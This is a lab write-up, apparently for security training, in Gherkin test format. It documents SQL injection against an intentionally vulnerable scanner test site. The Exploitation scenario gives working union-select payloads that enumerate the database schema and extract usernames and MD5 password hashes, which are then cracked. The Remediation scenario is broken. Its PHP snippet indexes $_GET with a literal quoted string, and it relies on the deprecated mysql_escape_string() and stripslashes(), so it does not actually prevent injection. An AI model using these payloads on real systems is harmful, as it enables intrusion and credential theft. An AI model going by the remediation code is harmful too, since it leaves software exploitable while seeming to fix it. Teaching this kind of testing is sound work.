## Version 1.4.1
## language: en

Feature: Search by name
  TOE:
    Web Scanner Test Site
  Category:
    SQL injection
  Location:
    http://www.webscantest.com/datastore/search_by_name.php
  CWE:
    CWE-598: Use of GET Request Method With Sensitive Query Strings
    https://cwe.mitre.org/data/definitions/598.html
    CWE-89: Improper Neutralization of Special Elements used in an SQL Command
    https://cwe.mitre.org/data/definitions/89.html
  Rule:
    REQ.173: Discard unsafe inputs
    https://fluidattacks.com/web/rules/173/
  Goal:
    Get the users and passwords in the database.
  Recommendation:
    Sanitize and validate inputs.
    Use of Prepared Statements (Parameterized Queries).

  Background:
      Hacker's software:
      | <Software name> | <Version>     |
      | Windows         | 10            |
      | Google Chrome   | 80.0.3987.132 |
    TOE information:
    Given I am accessing the site http://www.webscantest.com/
    Then I can see there is a web page with challenges

  Scenario: Normal use case:
    Given I access http://www.webscantest.com/
    And I select a challenge
    Then I can try to hack it

  Scenario: Static detection:
    Given I open the TOE
    Then I can see that the source code is inaccessible

  Scenario: Dynamic detection
    Given http://www.webscantest.com/datastore/search_get_by_name.php?name=Rake
    And I see that the URL send a parameter
    When I see the website I can see the info for the product "Rake"
    Then I think that the param in the URL can have any relation with the site
    And I think that the site use a method "GET" to use the parameter
    When I know that I try to inject something
    Then I try with "?name=Rake' "
    And I see the response
    When I get the response I can see that the response is a SQL error
    """
    Error 1064: You have an error in your SQL syntax; check the manual that
    corresponds to your MySQL server version for the right syntax to use near
    ''' at line 1 of SELECT * FROM inventory WHERE name = 'Rake' '
    """
    Then I know what is the query used to filter
    """
    SELECT * FROM inventory WHERE name = '<parameter with GET>'
    """
    And I can use it to inject other things
    When I want to see if the query scape some injections like
    """
    Rake' or 1='1
    """
    Then I submit the injection
    And I get the response with all products [evidence](img1)
    When I see all products with a small injection
    Then I can conclude that this field is vulnerable to SQL injection
    And I found a vulnerability

  Scenario: Exploitation
    Given The system is vulnerable to SQL injection
    And I want to get the users and passwords
    When I try to know the usernames and passwords
    Then I need the database name
    And I try to use the SQL injection to know the database name
    When I make a query yo know the database name
    """
    'union select '','Shovel',table_schema,'' from information_schema.tables
                                  union select '','Shovel','Databases ↑','

    Note: I add 'Shovel' for no reason, only want to see the picture
          because a Shovel can simbolize that i wan digging into the database
          and I add 'Databases' for an esthetic reason because I want to make
          more intuitive the response, the other columns are ' ' because
          I don't need it
    """
    Then I see the response [evidence](img2)
    And I see the name of the database and his name is "webscantest"
    When I know the database name I want to know the names of the tables
    Then I make the following query
    """
    ' union select '','Shovel',table_name,'' from information_schema.tables
                                  where table_schema ='webscantest' union
                                  select '','Shovel','Table names ↑;','
    """
    And I can see the names of the tables [evidence](img3)
    When I see the names I only need to get the data in the tables
    Then I make a query to knows what is contained in the table "accounts"
    """
    ' union select '','Deluxe Shovel',column_name,''
              from information_schema.columns where
              table_name ='accounts' union
              select '','Deluxe Shovel','Columns in the table ↑;','
    """
    And I can see the columns in the table [evidence](img4)
    When I know the columns I only need to get the data
    And I make the last query to extract the data
    """
    ' union all select id,uname,passwd,concat(' ',fname,' ',lname)
              from accounts union all
              select 'Account ID ↑;','Account Username ↑;',
              'Account Password ↑;',' User Name and Last Name ↑;
    """
    And I get the usernames and passwords [evidence](img5)
    When I see the passwords I think that are hashes
    Then I think that can be an MD5 hashes
    And I try to crack the hashes
    When I use the following web "https://www.md5online.org/md5-decrypt.html"
    Then I get the hashes
    """
    Found : <admin password>
    (hash = 21232f297a57a5a743894a0e4a801fc3)

    Found : <testuser password>
    (hash = 179ad45c6ce2cb97cf1029e212046e81)
    """
    And I exploit the vulnerability

  Scenario: Remediation
    Given I didn't have access to the source code
    And I can give a way to solve this vulnerability
    When I see that the page is in PHP
    Then I think that PHP has a function to escape SQL injections
    And I think that can be used "mysql_escape_string()" and "stripslashes()"
    """
    $input_method = 'GET';
    $input_name = 'name';
    $input_value = $_GET['$input_name'];
    $input_value = stripslashes($input_value);
    $input_value = mysql_escape_string($input_value);
    """
    When I think on it this can escape the SQL injections
    And I think that this can fix the vulnerability

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.5/10 (High) - AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.2/10 (High) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    8.9/10 (High) - CR:L/IR:L/AR:L/

  Scenario: Correlations
    No correlations have been found to this date 2020-04-24
